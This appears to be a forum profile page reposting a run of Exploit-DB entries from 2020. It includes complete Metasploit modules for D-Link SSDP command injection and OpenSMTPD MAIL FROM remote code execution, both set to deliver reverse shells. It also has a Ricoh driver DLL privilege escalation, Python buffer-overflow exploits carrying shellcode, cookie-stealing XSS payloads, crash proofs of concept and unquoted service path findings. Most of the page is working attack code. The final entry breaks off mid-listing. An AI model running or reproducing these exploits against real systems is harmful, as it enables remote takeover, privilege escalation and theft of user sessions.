
Everything posted by HireHackking
-
Dota 2 7.23f - Denial of Service (PoC)
# Exploit Title: Dota 2 7.23f - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2020-02-05
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com) (bi7s)
# Vendor Homepage: https://www.valvesoftware.com/en/
# Software Link: N/A
# Version: 7.23f
# Tested on: Windows 10 (x64)
# CVE : CVE-2020-7949

Valve Dota 2 (schemasystem.dll) before 7.23f allows remote attackers to achieve code execution or denial of service by creating a gaming server and inviting a victim to this server, because a crafted map is mishandled during a GetValue call.

An attacker needs to invite a victim to play on the attacker's game server using a specially crafted map, or to create a custom game; then, when the victim's game initializes, the specially crafted map will be automatically downloaded and processed by the victim, which leads to the possibility of exploiting the vulnerability. The attacker can also create a custom map and upload it to Steam <https://steamcommunity.com/sharedfiles/filedetails/?id=328258382>.

Steps to reproduce:
1. Copy the attached file zuff.vpk (https://github.com/bi7s/CVE/blob/master/CVE-2020-7949/zuff.zip) to the map directory (C:\Program Files (x86)\Steam\steamapps\common\dota 2 beta\game\dota\maps)
2. Launch Dota2
3. Launch the "zuff" map from the Dota2 game console. Command for the game console: map zuff
4. Dota2 crashes (Access Violation)

Debug information:
(2098.1634): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Steam\steamapps\common\dota 2 beta\game\bin\win64\schemasystem.dll -
(2098.1634): Access violation - code c0000005 (!!! second chance !!!)
rax=00000000ffffffff rbx=0000027ba23dd9b6 rcx=0000027ba23dd9b6
rdx=0000000042424242 rsi=0000027b5ffb9774 rdi=0000000000000000
rip=00007ffa73af90ce rsp=000000e82bcfe900 rbp=0000000000000000
 r8=00000000412ee51c  r9=000000e82bcfea88 r10=0000027b5ffb9774
r11=00000000412ee51c r12=0000027b5ffbe582 r13=000000e82bcfe9f0
r14=0000027b5ffb5328 r15=0000000000000010
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010200
schemasystem!BinaryProperties_GetValue+0x10ae:
00007ffa`73af90ce 40383b          cmp     byte ptr [rbx],dil ds:0000027b`a23dd9b6=??
-
WordPress Plugin LearnDash LMS 3.1.2 - Reflective Cross-Site Scripting
# Exploit Title: LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting
# Date: 2020-01-14
# Vendor Homepage: https://www.learndash.com
# Vendor Changelog: https://learndash.releasenotes.io/release/uCskc-version-312
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/reflected-xss-vulnerability-found-in-learndash-lms-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 3.0.0 - 3.1.1
# CVE : CVE-2020-7108

1. Description

LearnDash is one of the most popular and easiest to use WordPress LMS plugins in the market. It allows users to easily create courses and sell them online and boasts a large customer base. The plugin allows users to search for courses they have subscribed to using the [ld_profile] search field, which was found to be vulnerable to reflected cross-site scripting. All WordPress websites using LearnDash version 3.0.0 through 3.1.1 are affected.

2. Proof of Concept

Once the user is logged in to the WordPress website where the vulnerable LearnDash plugin is installed, the XSS payload can be inserted into the Search Your Courses box. The payload gets executed because the user input is not properly validated. As a result, passing the XSS payload as a query string in the URL will also execute the payload.

[wordpress website][learndash my-account page]?ld-profile-search=%3Cscript%3Ealert(document.cookie)%3C/script%3E

An attacker can modify the above URL and use an advanced payload that could help him/her in performing malicious actions.

GET /wp-admin/admin-ajax.php?action=ld30_ajax_profile_search&shortcode_instance%5Buser_id%5D=1&shortcode_instance%5Bper_page%5D=20&shortcode_instance%5Border%5D=DESC&shortcode_instance%5Borderby%5D=ID&shortcode_instance%5Bcourse_points_user%5D=yes&shortcode_instance%5Bexpand_all%5D=false&shortcode_instance%5Bprofile_link%5D=true&shortcode_instance%5Bshow_header%5D=yes&shortcode_instance%5Bshow_quizzes%5D=true&shortcode_instance%5Bshow_search%5D=yes&shortcode_instance%5Bquiz_num%5D=20&shortcode_instance%5Bpaged%5D=1&shortcode_instance%5Bs%5D=&ld-profile-search=%3Cscript%3Ealert(123)%3C%2Fscript%3E HTTP/1.1
Host: learndashtesting.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://learndashtesting.com/my-account-2/
Cookie: wordpress_bcfe62773b0917e2688ccaecd96abe61=jinson%7C1581504173%7CeztvQWuKhSrnfkyEkwN0TvUU4CuVBpuyXeGErewuFOv%7C7ec9ebfd67acdbc669395821f620198e67cb74780c9a8db63923b528aa661acd; PHPSESSID=e7c30849dbdab6f1cafcccef0ad7e7a0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcfe62773b0917e2688ccaecd96abe61=jinson%7C1581504173%7CeztvQWuKhSrnfkyEkwN0TvUU4CuVBpuyXeGErewuFOv%7Cfcf64acbc9b6ba7aaafb9c3b077581347d65ca8e010135cc232dcfc0335ec6d8; wordpress_cf_adm_use_adm=1; tk_ai=woo%3AEeO%2FMlU5TcDNKIjgYWPHxZVg; wp-settings-time-1=1581331685

3. Timeline

Vulnerability reported to the LearnDash team – January 14, 2020
LearnDash version 3.1.2 containing the fix released – January 14, 2020
-
iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()
While investigating possible shared memory issues in AGXCommandQueue::processSegmentKernelCommand(), I noticed that the size checks used to parse the IOAccelKernelCommand in IOAccelCommandQueue2::processSegmentKernelCommand() are incorrect. The IOAccelKernelCommand contains an 8-byte header consisting of a command type and size, followed by structured data specific to the type of command. When verifying that the size of the IOAccelKernelCommand has enough data for the specific command type, it appears that the check excludes the size of the 8-byte header, meaning that processSegmentKernelCommand() will parse up to 8 bytes of out-of-bounds data.

Normally I wouldn't consider this very security-relevant. However, command type 2 corresponds to kIOAccelKernelCommandCollectTimeStamp, which actually *writes* into the OOB memory rather than just parsing data from it. (The IOAccelKernelCommand is being parsed from shared memory, so the write is visible to userspace.) This makes it possible to overwrite the first 1-8 bytes of the subsequent page of memory with timestamp data.

The attached POC should trigger the issue on iOS 13. Tested on iPod9,1 17B111. I haven't tested on macOS, but it looks like the issue is present there as well.

I'll also tack on to this issue that on the whole AGXCommandQueue seems to do a poor job of treating shared memory as volatile, and I suspect that there are further issues here that are worth looking into. For example, when IOAccelKernelCommand's type is 0x10000, AGXCommandQueue::processSegmentKernelCommand() does not use the fourth parameter (which points to the end of the IOAccelKernelCommand as parsed by IOAccelCommandQueue2::processSegmentKernelCommands()) except when passing it to IOAccelCommandQueue2::processSegmentKernelCommand(), instead double-fetching the command size from shared memory to verify that all the command data is in-bounds. Thus, I believe it's possible to make AGXCommandQueue::processSegmentKernelCommand() parse out-of-bounds data, although I have not found a way to turn this into an interesting exploitation primitive.

I don't think the shared memory issues are isolated to this function either. For example, there used to be much more readily exploitable double-fetches in AGXAllocationList2::initWithSharedResourceList(), although these were fixed sometime between 16A5288q and 16G77.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48035.zip
-
D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',
      'Description'     => %q{
        D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.
      },
      'Author'          =>
        [
          's1kr10s',
          'secenv'
        ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          ['CVE', '2019-20215'],
          ['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']
        ],
      'DisclosureDate'  => 'Dec 24 2019',
      'Privileged'      => true,
      'Platform'        => 'linux',
      'Arch'            => ARCH_MIPSBE,
      'DefaultOptions'  =>
        {
          'PAYLOAD'           => 'linux/mipsbe/meterpreter_reverse_tcp',
          'CMDSTAGER::FLAVOR' => 'wget',
          'RPORT'             => '1900'
        },
      'Targets'         =>
        [
          [ 'Auto', { } ],
        ],
      'CmdStagerFlavor' => %w{ echo wget },
      'DefaultTarget'   => 0
    ))

    register_options(
      [
        Msf::OptEnum.new('VECTOR', [true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
      ])
  end

  def exploit
    execute_cmdstager(linemax: 1500)
  end

  def execute_command(cmd, opts)
    type = datastore['VECTOR']
    if type == "URN"
      print_status("Target Payload URN")
      val = "urn:device:1;`#{cmd}`"
    else
      print_status("Target Payload UUID")
      val = "uuid:`#{cmd}`"
    end

    connect_udp
    header = "M-SEARCH * HTTP/1.1\r\n"
    header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n"
    header << "ST:#{val}\r\n"
    header << "Man:\"ssdp:discover\"\r\n"
    header << "MX:2\r\n\r\n"
    udp_sock.put(header)
    disconnect_udp
  end
end
-
Ricoh Driver - Privilege Escalation (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/exe'

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Priv
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ricoh Driver Privilege Escalation',
      'Description'    => %q(
        Various Ricoh printer drivers allow escalation of privileges on Windows systems.
        For vulnerable drivers, a low-privileged user can read/write files within the
        `RICOH_DRV` directory and its subdirectories. `PrintIsolationHost.exe`, a Windows
        process running as NT AUTHORITY\SYSTEM, loads driver-specific DLLs during the
        installation of a printer. A user can elevate to SYSTEM by writing a malicious
        DLL to the vulnerable driver directory and adding a new printer with a vulnerable
        driver. This module leverages the `prnmngr.vbs` script to add and delete printers.
        Multiple runs of this module may be required given successful exploitation is
        time-sensitive.
      ),
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Alexander Pudwill', # discovery & PoC
          'Pentagrid AG',      # PoC
          'Shelby Pace'        # msf module
        ],
      'References'     =>
        [
          [ 'CVE', '2019-19363'],
          [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
        ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'Platform'       => 'win',
      'Payload'        => { },
      'SessionTypes'   => [ 'meterpreter' ],
      'Targets'        => [[ 'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]],
      'Notes'          =>
        {
          'SideEffects' => [ ARTIFACTS_ON_DISK ],
          'Reliability' => [ UNRELIABLE_SESSION ],
          'Stability'   => [ SERVICE_RESOURCE_LOSS ]
        },
      'DisclosureDate' => "Jan 22 2020",
      'DefaultTarget'  => 0
    ))

    self.needs_cleanup = true

    register_advanced_options([
      OptBool.new('ForceExploit', [ false, 'Override check result', false ])
    ])
  end

  def check
    dir_name = "C:\\ProgramData\\RICOH_DRV"
    return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name)

    driver_names = dir(dir_name)
    # An Integer is always truthy in Ruby, so test for an empty listing explicitly
    return CheckCode::Detected("Detected Ricoh driver directory, but no installed drivers") if driver_names.empty?

    vulnerable = false
    driver_names.each do |driver_name|
      full_path = "#{dir_name}\\#{driver_name}\\_common\\dlz"
      next unless directory?(full_path)

      @driver_path = full_path
      res = cmd_exec("icacls \"#{@driver_path}\"")
      next unless res.include?('Everyone:')
      next unless res.match(/\(F\)/)

      vulnerable = true
      break
    end

    return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable

    vprint_status("Vulnerable driver directory: #{@driver_path}")
    CheckCode::Appears('Ricoh driver directory has full permissions')
  end

  def add_printer(driver_name)
    fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)

    dll_data = generate_payload_dll
    dll_path = "#{@driver_path}\\headerfooter.dll"
    temp_path = expand_path('%TEMP%\\headerfooter.dll')
    vprint_status("Writing dll to #{temp_path}")

    bat_file_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(5..9)}.bat")
    cp_cmd = "copy /y \"#{temp_path}\" \"#{dll_path}\""
    bat_file = <<~HEREDOC
      :repeat
      #{cp_cmd} && goto :repeat
    HEREDOC

    write_file(bat_file_path, bat_file)
    write_file(temp_path, dll_data)
    register_files_for_cleanup(bat_file_path, temp_path)

    script_cmd = "cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""
    bat_cmd = "cmd.exe /c \"#{bat_file_path}\""

    print_status("Adding printer #{@printer_name}...")
    client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })
    vprint_status("Executing script...")
    cmd_exec(bat_cmd)
  rescue Rex::Post::Meterpreter::RequestError => e
    elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
  end

  def exploit
    fail_with(Failure::None, 'Already running as SYSTEM') if is_system?
    fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'

    if sysinfo['Architecture'] != payload.arch.first
      fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')
    end

    @driver_path = ''
    unless check == CheckCode::Appears || datastore['ForceExploit']
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override')
    end

    @printer_name = Rex::Text.rand_text_alpha(5..9)
    @script_path = "C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs"

    drvr_name = @driver_path.split('\\')
    drvr_name_idx = drvr_name.index('RICOH_DRV') + 1
    drvr_name = drvr_name[drvr_name_idx]
    add_printer(drvr_name)
  end

  def cleanup
    print_status("Deleting printer #{@printer_name}")
    Rex.sleep(3)
    delete_cmd = "cscript \"#{@script_path}\" -d -p \"#{@printer_name}\""
    client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })
  end
end
-
Torrent iPod Video Converter 1.51 - Stack Overflow
# Exploit Title: Torrent iPod Video Converter 1.51 - Stack Overflow
# Exploit Author: boku
# Date: 2020-02-10
# Software Vendor: torrentrockyou
# Vendor Homepage: http://www.torrentrockyou.com
# Software Link: http://www.torrentrockyou.com/download/tripodconverter.exe
# Version: Torrent iPod Video Converter Version 1.51 Build 115
# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363

# Recreate:
# 1) Download, install, and open Torrent iPod Video Converter
# 2) run python script & open created 'poc.txt' file
# 3) select-all > copy-all
# 4) in app, click 'Register' on the bottom
# 5) in 'Name:' textbox enter 'a'
# 6) in 'Code:' textbox paste buffer
# 7) click 'OK', calculator will open & app will crash

# ghoul@theZiggurat# msfvenom -p windows/exec CMD=calc EXITFUNC=seh --encoder x86/alpha_upper -v shellcode -f python
# x86/alpha_upper chosen with final size 447
# the decoder stubs GetPC routine includes bad characters. ESI is already at PC so no need to find it. Just remove the GetPC routine in the stub.
#shellcode = b"\x89\xe7\xda\xdc\xd9\x77\xf4\x5d\x55\x59\x49"
# echo -ne "\x89\xe7\xda\xdc\xd9\x77\xf4\x5d\x55\x59\x49" | ndisasm -
# 89E7      mov di,sp
# DADC      fcmovu st4
# D977F4    fnstenv [bx-0xc]
# 5D        pop bp
# 55        push bp
# 59        pop cx
# 49        dec cx
shellcode  = b'\x54\x5f'              # push esp # pop edi
shellcode += b'\x56\x59'              # push esi # pop ecx
shellcode += b'\x41\x90'              # inc ecx # nop # Fix the offset for GetPC
shellcode += b'\x90\x90\x90\x90\x90'  # keep the byte length the same
shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x45\x50\x35\x50"
shellcode += b"\x45\x50\x35\x30\x4c\x49\x4a\x45\x50\x31\x39"
shellcode += b"\x50\x33\x54\x4c\x4b\x36\x30\x30\x30\x4c\x4b"
shellcode += b"\x36\x32\x54\x4c\x4c\x4b\x50\x52\x32\x34\x4c"
shellcode += b"\x4b\x53\x42\x31\x38\x44\x4f\x38\x37\x50\x4a"
shellcode += b"\x57\x56\x30\x31\x4b\x4f\x4e\x4c\x37\x4c\x43"
shellcode += b"\x51\x43\x4c\x54\x42\x36\x4c\x57\x50\x39\x51"
shellcode += b"\x48\x4f\x34\x4d\x43\x31\x49\x57\x4d\x32\x4c"
shellcode += b"\x32\x36\x32\x31\x47\x4c\x4b\x56\x32\x44\x50"
shellcode += b"\x4c\x4b\x51\x5a\x47\x4c\x4c\x4b\x30\x4c\x44"
shellcode += b"\x51\x43\x48\x5a\x43\x57\x38\x43\x31\x48\x51"
shellcode += b"\x46\x31\x4c\x4b\x31\x49\x57\x50\x35\x51\x59"
shellcode += b"\x43\x4c\x4b\x30\x49\x34\x58\x4d\x33\x57\x4a"
shellcode += b"\x50\x49\x4c\x4b\x36\x54\x4c\x4b\x43\x31\x58"
shellcode += b"\x56\x30\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
shellcode += b"\x54\x4d\x55\x51\x39\x57\x47\x48\x4b\x50\x54"
shellcode += b"\x35\x4c\x36\x45\x53\x53\x4d\x4c\x38\x47\x4b"
shellcode += b"\x43\x4d\x47\x54\x43\x45\x4d\x34\x51\x48\x4c"
shellcode += b"\x4b\x50\x58\x37\x54\x43\x31\x4e\x33\x53\x56"
shellcode += b"\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x30\x58\x45"
shellcode += b"\x4c\x55\x51\x49\x43\x4c\x4b\x43\x34\x4c\x4b"
shellcode += b"\x33\x31\x38\x50\x4d\x59\x50\x44\x57\x54\x31"
shellcode += b"\x34\x51\x4b\x51\x4b\x45\x31\x30\x59\x31\x4a"
shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x51"
shellcode += b"\x4a\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x31\x4d"
shellcode += b"\x52\x4a\x45\x51\x4c\x4d\x4d\x55\x4f\x42\x45"
shellcode += b"\x50\x55\x50\x35\x50\x56\x30\x45\x38\x56\x51"
shellcode += b"\x4c\x4b\x42\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f"
shellcode += b"\x4b\x4b\x4e\x44\x4e\x37\x42\x4a\x4a\x45\x38"
shellcode += b"\x4f\x56\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x59"
shellcode += b"\x45\x37\x4c\x43\x36\x33\x4c\x34\x4a\x4d\x50"
shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x35\x55\x4f\x4b\x37"
shellcode += b"\x37\x34\x53\x43\x42\x42\x4f\x53\x5a\x35\x50"
shellcode += b"\x56\x33\x4b\x4f\x4e\x35\x32\x43\x35\x31\x52"
shellcode += b"\x4c\x52\x43\x33\x30\x41\x41"

EIP_OS = '\x41'*(4136-len(shellcode))
EIP = '\x5a\x32\x4f'  # 0x004f325a : call esi {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent IPOD Video Converter\bsvideoconverter.exe)

payload = shellcode + EIP_OS + EIP

try:
    f=open("poc.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Expect

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'OpenSMTPD MAIL FROM Remote Code Execution',
      'Description'    => %q{
        This module exploits a command injection in the MAIL FROM field
        during SMTP interaction with OpenSMTPD to execute code as the root
        user.
      },
      'Author'         => [
        'Qualys',                                 # Discovery and PoC
        'wvu',                                    # Module
        'RageLtMan <rageltman[at]sempervictus>'   # Module
      ],
      'References'     => [
        ['CVE', '2020-7247'],
        ['URL', 'https://www.openwall.com/lists/oss-security/2020/01/28/3']
      ],
      'DisclosureDate' => '2020-01-28',
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Privileged'     => true,
      'Targets'        => [
        ['OpenSMTPD >= commit a8e222352f',
         'MyBadChars' => "!\#$%&'*?`{|}~\r\n".chars
        ]
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
    ))

    register_options([
      Opt::RPORT(25),
      OptString.new('RCPT_TO', [true, 'Valid mail recipient', 'root'])
    ])

    register_advanced_options([
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])
    ])
  end

  def check
    connect

    res = sock.get_once

    return CheckCode::Unknown unless res
    return CheckCode::Detected if res =~ /^220.*OpenSMTPD/

    CheckCode::Safe
  rescue EOFError, Rex::ConnectionError => e
    vprint_error(e.message)
    CheckCode::Unknown
  ensure
    disconnect
  end

  def exploit
    unless datastore['ForceExploit']
      unless check == CheckCode::Detected
        fail_with(Failure::Unknown, 'Set ForceExploit to override')
      end
    end

    # We don't care who we are, so randomize it
    me = rand_text_alphanumeric(8..42)

    # Send mail to this valid recipient
    to = datastore['RCPT_TO']

    # Comment "slide" courtesy of Qualys - brilliant!
    iter = rand_text_alphanumeric(15).chars.join(' ')
    from = ";for #{rand_text_alpha(1)} in #{iter};do read;done;sh;exit 0;"

    # This is just insurance, since the code was already written
    if from.length > 64
      fail_with(Failure::BadConfig, 'MAIL FROM field is greater than 64 chars')
    elsif (badchars = (from.chars & target['MyBadChars'])).any?
      fail_with(Failure::BadConfig, "MAIL FROM field has badchars: #{badchars}")
    end

    # Create the mail body with comment slide and payload
    body = "\r\n" + "#\r\n" * 15 + payload.encoded

    sploit = {
      nil                   => /220.*OpenSMTPD/,
      "HELO #{me}"          => /250.*pleased to meet you/,
      "MAIL FROM:<#{from}>" => /250.*Ok/,
      "RCPT TO:<#{to}>"     => /250.*Recipient ok/,
      'DATA'                => /354 Enter mail.*itself/,
      body                  => nil,
      '.'                   => /250.*Message accepted for delivery/,
      'QUIT'                => /221.*Bye/
    }

    print_status('Connecting to OpenSMTPD')
    connect

    print_status('Saying hello and sending exploit')
    sploit.each do |line, pattern|
      send_expect(
        line,
        pattern,
        sock:    sock,
        timeout: datastore['ExpectTimeout'],
        newline: "\r\n"
      )
    end
  rescue Rex::ConnectionError => e
    fail_with(Failure::Unreachable, e.message)
  rescue Timeout::Error => e
    fail_with(Failure::TimeoutExpired, e.message)
  ensure
    disconnect
  end
end
-
CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting
# Exploit Title: CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting
# Google Dork: In Shodan search engine, the filter is "CHIYU"
# Date: 2020-02-11
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.chiyu-t.com.tw/en/
# Version: BF430 232/485 TCP/IP Converter all versions prior to 1.16.00
# Tested on: It is a proprietary device: https://www.chiyu-t.com.tw/en/product/rs485-to-tcp_ip-converter_BF-430.html
# CVE: CVE-2020-8839

# 1. Description:
# In the CHIYU BF430 web page, a user can modify the system configuration by accessing /if.cgi.
# Attackers can inject malicious XSS code in the "TF_submask" field.
# The XSS code is stored in the database, which causes a stored XSS vulnerability.

# 2. Proof of Concept:
# Access the /if.cgi of the CHIYU BF430 232/485 TCP/IP Converter.
# Inject the XSS code in the parameter "TF_submask":
# http://<Your Modem IP>/if.cgi?TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
-
freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path
Exploit Title: freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.freesshd.com
Software Link: http://www.freesshd.com/freeFTPd.exe
Version: 1.0.13
Tested On: Windows 10 (32-bit)

C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "freeftp" | findstr /i /v """
freeFTPdService    C:\Program Files\freeSSHd\freeFTPdService.exe    Auto

C:\Users\nightelf>sc qc freeFTPdService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: freeFTPdService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\freeSSHd\freeFTPdService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : freeFTPdService
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem
-
Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting
# Exploit Title: Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2020-02-10
# Exploit Author: Sayak Naskar
# Vendor Homepage: https://vanillaforums.com/en/
# Version: 2.6.3
# Tested on: Windows, Linux
# CVE : CVE-2020-8825

A stored XSS was found in Vanilla Forums 2.6.3.

index.php?p=/dashboard/settings/branding

# Proof of Concept:
An attacker inserts a payload in the branding section. Then, whenever a user opens the branding section, the attacker automatically gets all sensitive information of the user.
-
DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow
#Exploit Title: DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-10
#Vendor Homepage : http://www.picture-on-tv.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a

## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "key.txt".
#2. Just copy the text inside "key.txt".
#3. Start the program. In the new window click "Help" > "Register ...
#4. Now paste the content of "key.txt" into the field: "Registration Key" > Click "Ok"
#5. The calculator runs successfully

#!/usr/bin/python
from struct import pack

buffer = "\x41" * 1608
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x10014283) #0x10014283 : pop ebx # pop ecx # ret 0x0c | {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\DVD Photo Slideshow Professional\DVDPhotoData.dll)

shellcode = ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode

try:
    f=open("key.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
-
FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path
Exploit Title: FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.freesshd.com
Software Link: http://www.freesshd.com/freeSSHd.exe
Version: 1.3.1
Tested On: Windows 10 (32-bit)

C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "freesshd" | findstr /i /v """
FreeSSHDService    C:\Program Files\freeSSHd\FreeSSHDService.exe    Auto

C:\Users\nightelf>sc qc FreeSSHDService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FreeSSHDService
